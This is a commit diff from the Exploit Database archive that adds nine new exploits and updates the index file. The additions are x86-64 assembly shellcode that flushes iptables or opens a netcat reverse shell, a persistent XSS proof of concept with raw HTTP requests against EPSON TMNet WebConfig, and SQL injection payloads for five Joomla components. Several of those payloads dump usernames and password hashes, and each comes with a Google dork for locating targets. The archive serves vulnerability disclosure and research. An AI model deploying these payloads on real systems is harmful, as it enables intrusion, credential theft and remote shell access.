DB: 2017-03-06
9 new exploits Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes) Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes) Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes) Joomla! Component com_jumi - (fileid) Blind SQL Injection Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection EPSON TMNet WebConfig 1.00 - Cross-Site Scripting Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection Joomla! Component Content ConstructionKit 1.1 - SQL Injection Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection
This commit is contained in:
parent
d3106003d4
commit
4811e36301
10 changed files with 378 additions and 1 deletions
11
files.csv
11
files.csv
|
@ -15928,6 +15928,9 @@ id,file,description,date,author,platform,type,port
|
|||
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
|
||||
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
|
||||
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -21317,7 +21320,7 @@ id,file,description,date,author,platform,type,port
|
|||
8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0
|
||||
8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0
|
||||
8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0
|
||||
8968,platforms/php/webapps/8968.txt,"Joomla! Component com_jumi - (fileid) Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
|
||||
8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Parameter Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0
|
||||
8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0
|
||||
8975,platforms/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,php,webapps,0
|
||||
8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0
|
||||
|
@ -37416,3 +37419,9 @@ id,file,description,date,author,platform,type,port
|
|||
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
|
||||
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
|
||||
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
|
||||
41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0
|
||||
41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
57
platforms/hardware/webapps/41502.txt
Executable file
57
platforms/hardware/webapps/41502.txt
Executable file
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: Persistent XSS in EPSON TMNet WebConfig Ver. 1.00
|
||||
# Google Dork: intitle:"EPSON TMNet WebConfig Ver.1.00"
|
||||
# Date: 3/3/2017
|
||||
# Exploit Author: Michael Benich
|
||||
# Vendor Homepage: https://www.epson-biz.com/
|
||||
# Software Link: https://c4b.epson-biz.com/modules/community/index.php?content_id=50
|
||||
# Version: 1.00
|
||||
# CVE: CVE-2017-6443
|
||||
# Contact: benichmt1@protonmail.com // @benichmt1
|
||||
#####################################################################################
|
||||
|
||||
Summary:
|
||||
Persistent cross-site scripting (XSS) in the web interface of Epson's TMNet WebConfig Ver 1.00 application allows a remote attacker to introduce arbitary Javascript via manipulation of an unsanitized POST parameter.
|
||||
|
||||
Steps to reproduce:
|
||||
|
||||
1)Make a POST request using Burp Proxy or other application
|
||||
|
||||
------------------------------------------------------------------------------------------
|
||||
POST /Forms/oadmin_1 HTTP/1.1
|
||||
Host: XXX.XXX.XXX.XXX
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://XXX.XXX.XXX.XXX/oadmin.htm
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 47
|
||||
|
||||
W_AD1=<script>window.alert(0)</script>&W_Link1=&Submit=SUBMIT
|
||||
|
||||
------------------------------------------------------------------------------------------
|
||||
2) Browsing to the main page will execute your script. This remains persistent for any user who then visits this page.
|
||||
|
||||
GET /istatus.htm HTTP/1.1
|
||||
Host: XXX.XXX.XXX.XXX
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://XXX.XXX.XXX.XXX/side.htm
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
------------------------------------------------------------------------------------------
|
||||
|
||||
Timeline:
|
||||
|
||||
------------------------------------------------------------------------------------------
|
||||
12/1/2016 - Discovery.
|
||||
12/9/2016 - Emailed support@ , info@ , and domain-admin@ emails. No response.
|
||||
12/16/2016 - Pinged on Twitter. Recommended to contact through support.
|
||||
12/22/2016 - Reached on LinkedIn directly to individual listed as Security Engineer and asked to find proper security contact channel. No response, but the connection request was accepted.
|
||||
3/3/2017 - Disclosure
|
||||
------------------------------------------------------------------------------------------
|
53
platforms/lin_x86-64/shellcode/41503.nasm
Executable file
53
platforms/lin_x86-64/shellcode/41503.nasm
Executable file
|
@ -0,0 +1,53 @@
|
|||
;The MIT License (MIT)
|
||||
|
||||
;Copyright (c) 2017 Robert L. Taylor
|
||||
|
||||
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||
;copy of this software and associated documentation files (the “Software”),
|
||||
;to deal in the Software without restriction, including without limitation
|
||||
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||
;and/or sell copies of the Software, and to permit persons to whom the
|
||||
;Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
;The above copyright notice and this permission notice shall be included
|
||||
;in all copies or substantial portions of the Software.
|
||||
|
||||
;The Software is provided “as is”, without warranty of any kind, express or
|
||||
;implied, including but not limited to the warranties of merchantability,
|
||||
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||
;authors or copyright holders be liable for any claim, damages or other
|
||||
;liability, whether in an action of contract, tort or otherwise, arising
|
||||
;from, out of or in connection with the software or the use or other
|
||||
;dealings in the Software.
|
||||
;
|
||||
; For a detailed explanation of this shellcode see my blog post:
|
||||
; http://a41l4.blogspot.ca/2017/03/polyflushiptables1434.html
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
push 82
|
||||
pop rax
|
||||
cdq
|
||||
push rdx
|
||||
push word '-F'
|
||||
push rsp
|
||||
pop rbx
|
||||
push rdx
|
||||
mov rcx, 'iptables'
|
||||
push rcx
|
||||
shl al,1
|
||||
sub al,cl
|
||||
mov rcx, '//sbin//'
|
||||
push rcx
|
||||
push rsp
|
||||
pop rdi
|
||||
push rdx
|
||||
push rbx
|
||||
push rdi
|
||||
push rsp
|
||||
pop rsi
|
||||
syscall
|
||||
|
70
platforms/lin_x86-64/shellcode/41509.nasm
Executable file
70
platforms/lin_x86-64/shellcode/41509.nasm
Executable file
|
@ -0,0 +1,70 @@
|
|||
;The MIT License (MIT)
|
||||
|
||||
;Copyright (c) 2017 Robert L. Taylor
|
||||
|
||||
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||
;copy of this software and associated documentation files (the “Software”),
|
||||
;to deal in the Software without restriction, including without limitation
|
||||
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||
;and/or sell copies of the Software, and to permit persons to whom the
|
||||
;Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
;The above copyright notice and this permission notice shall be included
|
||||
;in all copies or substantial portions of the Software.
|
||||
|
||||
;The Software is provided “as is”, without warranty of any kind, express or
|
||||
;implied, including but not limited to the warranties of merchantability,
|
||||
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||
;authors or copyright holders be liable for any claim, damages or other
|
||||
;liability, whether in an action of contract, tort or otherwise, arising
|
||||
;from, out of or in connection with the software or the use or other
|
||||
;dealings in the Software.
|
||||
;
|
||||
; For a detailed explanation of this shellcode see my blog post:
|
||||
; http://a41l4.blogspot.ca/2017/03/netcatrevshell1434.html
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
xor edx,edx
|
||||
push '1337'
|
||||
push rsp
|
||||
pop rcx
|
||||
|
||||
push rdx
|
||||
mov rax,'/bin//sh'
|
||||
push rax
|
||||
push rsp
|
||||
pop rbx
|
||||
|
||||
push rdx
|
||||
mov rax,'/bin//nc'
|
||||
push rax
|
||||
push rsp
|
||||
pop rdi
|
||||
|
||||
push '1'
|
||||
mov rax,'127.0.0.'
|
||||
push rax
|
||||
push rsp
|
||||
pop rsi
|
||||
|
||||
push rdx
|
||||
push word '-e'
|
||||
push rsp
|
||||
pop rax
|
||||
|
||||
push rdx ; push null
|
||||
push rbx ; '/bin//sh'
|
||||
push rax ; '-e'
|
||||
push rcx ; '1337'
|
||||
push rsi ; '127.0.0.1'
|
||||
push rdi ; '/bin//nc'
|
||||
push rsp
|
||||
pop rsi ; address of array of pointers to strings
|
||||
|
||||
push 59 ; execve system call
|
||||
pop rax
|
||||
syscall
|
84
platforms/lin_x86-64/shellcode/41510.nsam
Executable file
84
platforms/lin_x86-64/shellcode/41510.nsam
Executable file
|
@ -0,0 +1,84 @@
|
|||
;The MIT License (MIT)
|
||||
|
||||
;Copyright (c) 2017 Robert L. Taylor
|
||||
|
||||
;Permission is hereby granted, free of charge, to any person obtaining a
|
||||
;copy of this software and associated documentation files (the “Software”),
|
||||
;to deal in the Software without restriction, including without limitation
|
||||
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
|
||||
;and/or sell copies of the Software, and to permit persons to whom the
|
||||
;Software is furnished to do so, subject to the following conditions:
|
||||
|
||||
;The above copyright notice and this permission notice shall be included
|
||||
;in all copies or substantial portions of the Software.
|
||||
|
||||
;The Software is provided “as is”, without warranty of any kind, express or
|
||||
;implied, including but not limited to the warranties of merchantability,
|
||||
;fitness for a particular purpose and noninfringement. In no event shall the
|
||||
;authors or copyright holders be liable for any claim, damages or other
|
||||
;liability, whether in an action of contract, tort or otherwise, arising
|
||||
;from, out of or in connection with the software or the use or other
|
||||
;dealings in the Software.
|
||||
; For a detailed explanation of this shellcode see my blog post:
|
||||
; http://a41l4.blogspot.ca/2017/03/polynetcatrevshell1434.html
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
jmp next
|
||||
sh:
|
||||
db 0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f
|
||||
nc:
|
||||
db 0x63,0x6e,0x2f,0x2f,0x6e,0x69,0x62,0x2f
|
||||
ip:
|
||||
db 0x2e,0x30,0x2e,0x30,0x2e,0x37,0x32,0x31
|
||||
handle:
|
||||
pop rcx
|
||||
lodsq
|
||||
bswap rax
|
||||
push rax
|
||||
push rsp
|
||||
push rcx
|
||||
ret
|
||||
next:
|
||||
xor edx,edx
|
||||
lea rsi,[rel sh]
|
||||
push rdx
|
||||
call handle
|
||||
pop rbx
|
||||
|
||||
push rdx
|
||||
call handle
|
||||
pop rdi
|
||||
|
||||
push '1'
|
||||
call handle
|
||||
pop r12
|
||||
|
||||
push '1337'
|
||||
push rsp
|
||||
pop rcx
|
||||
|
||||
push rdx
|
||||
push word '-e'
|
||||
push rsp
|
||||
pop rax
|
||||
|
||||
push rdx ; push null
|
||||
push rbx ; '/bin//sh'
|
||||
push rax ; '-e'
|
||||
push rcx ; '1337'
|
||||
push r12 ; '127.0.0.1'
|
||||
push rdi ; '/bin//nc'
|
||||
push rsp
|
||||
pop rsi ; address of array of pointers to strings
|
||||
|
||||
; some magic to put 3b (59) into RAX
|
||||
; note that this depends on the push "-e"
|
||||
; and it's position on the stack
|
||||
mov rax,[rsp + 48]
|
||||
shr rax,8
|
||||
sub rax,0x2a
|
||||
syscall
|
18
platforms/php/webapps/41504.txt
Executable file
18
platforms/php/webapps/41504.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component JUX EventOn v1.0.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_jux_eventon
|
||||
# Date: 04.03.2017
|
||||
# Vendor Homepage: http://joomlaux.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/jux-eventon/
|
||||
# Demo: http://demo.joomlaux.com/extensions/eventon/
|
||||
# Version: 1.0.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_jux_eventon&view=event&id=[SQL]
|
||||
# 3+union+select+1,@@version,3,4,5,6
|
||||
# # # # #
|
18
platforms/php/webapps/41505.txt
Executable file
18
platforms/php/webapps/41505.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Monthly Archive v3.6.4 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_monthlyarchive
|
||||
# Date: 04.03.2017
|
||||
# Vendor Homepage: http://web357.eu/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/monthly-archive/
|
||||
# Demo: http://demo.web357.eu/joomla/en/browse/monthly-archive
|
||||
# Version: 3.6.4
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php?option=com_monthlyarchive&view=monthlyarchive&month_year_form=07-2017&order=0&author_form=[SQL]
|
||||
# 1+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
|
||||
# # # # #
|
29
platforms/php/webapps/41506.txt
Executable file
29
platforms/php/webapps/41506.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component AYS Quiz v1.0 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_aysquiz
|
||||
# Date: 04.03.2017
|
||||
# Vendor Homepage: http://ays-pro.com/
|
||||
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/ays-quiz/
|
||||
# Demo: http://demo.ays-pro.com/index.php/ays-quiz
|
||||
# Version: 1.0
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/index.php?option=com_aysquiz&controller=question&id=[SQL]&format=raw
|
||||
# For example;
|
||||
# 1'+/*!50000union*/+select+(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),2,3,4,5-- -&format=raw
|
||||
# :title<li>whlzd_users
|
||||
# :id<li>whlzd_users
|
||||
# :name<li>whlzd_users
|
||||
# :username<li>whlzd_users
|
||||
# :email<li>whlzd_users
|
||||
# :password<li>whlzd_users
|
||||
# :block<li>whlzd_users
|
||||
# 1'+/*!50000union*/+select+/*!50000concat*/(username,/*!50000char*/(58),password),2,3,4,5+from+whlzd_users-- -&format=raw
|
||||
# <input class='ays_radio hide' type='radio' id='ans_admin:$2y$10$T7Cetq0lrME/gyxxS0usx.bh2OldeDOhccAW7Ikf33.KhbmZbEgfa'
|
||||
# Etc...
|
||||
# # # # #
|
20
platforms/php/webapps/41507.txt
Executable file
20
platforms/php/webapps/41507.txt
Executable file
|
@ -0,0 +1,20 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component Content ConstructionKit v1.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_os_cck
|
||||
# Date: 04.03.2017
|
||||
# Vendor Homepage: http://ordasoft.com/
|
||||
# Software Buy: http://ordasoft.com/cck-content-construction-kit-for-joomla.html
|
||||
# Demo: http://ordasvit.com/joomla-cck-classic/
|
||||
# Version: 1.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# http://localhost/[PATH]/index.php/2016-04-11-13-03-22/search?search=Ihsan_Sencan&categories[]=[SQL]&task=search&option=com_os_cck&Itemid=133
|
||||
# 9+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e,0x496873616e53656e63616e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
|
||||
# 1062 Duplicate entry 'ordasvit_joomla-cck-classic~IhsanSencan1' for key 'group_key'
|
||||
# Etc..
|
||||
# # # # #
|
19
platforms/php/webapps/41508.txt
Executable file
19
platforms/php/webapps/41508.txt
Executable file
|
@ -0,0 +1,19 @@
|
|||
# # # # #
|
||||
# Exploit Title: Joomla! Component AltaUserPoints v1.1 - SQL Injection
|
||||
# Google Dork: inurl:index.php?option=com_altauserpoints
|
||||
# Date: 04.03.2017
|
||||
# Vendor Homepage: https://www.nordmograph.com/
|
||||
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/credits-a-point-systems/altauserpoints/
|
||||
# Demo: https://www.nordmograph.com/workshop/
|
||||
# Version: 1.1
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/index.php?option=com_altauserpoints&view=account&userid=[SQL]
|
||||
# 1'+/*!50000OR*/+1+/*!50000GROUP*/+BY+/*!50000CONCAT_WS*/(0x3a,0x496873616e53656e63616e,DATABASE(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1-- -
|
||||
# # # # #
|
Loading…
Add table
Reference in a new issue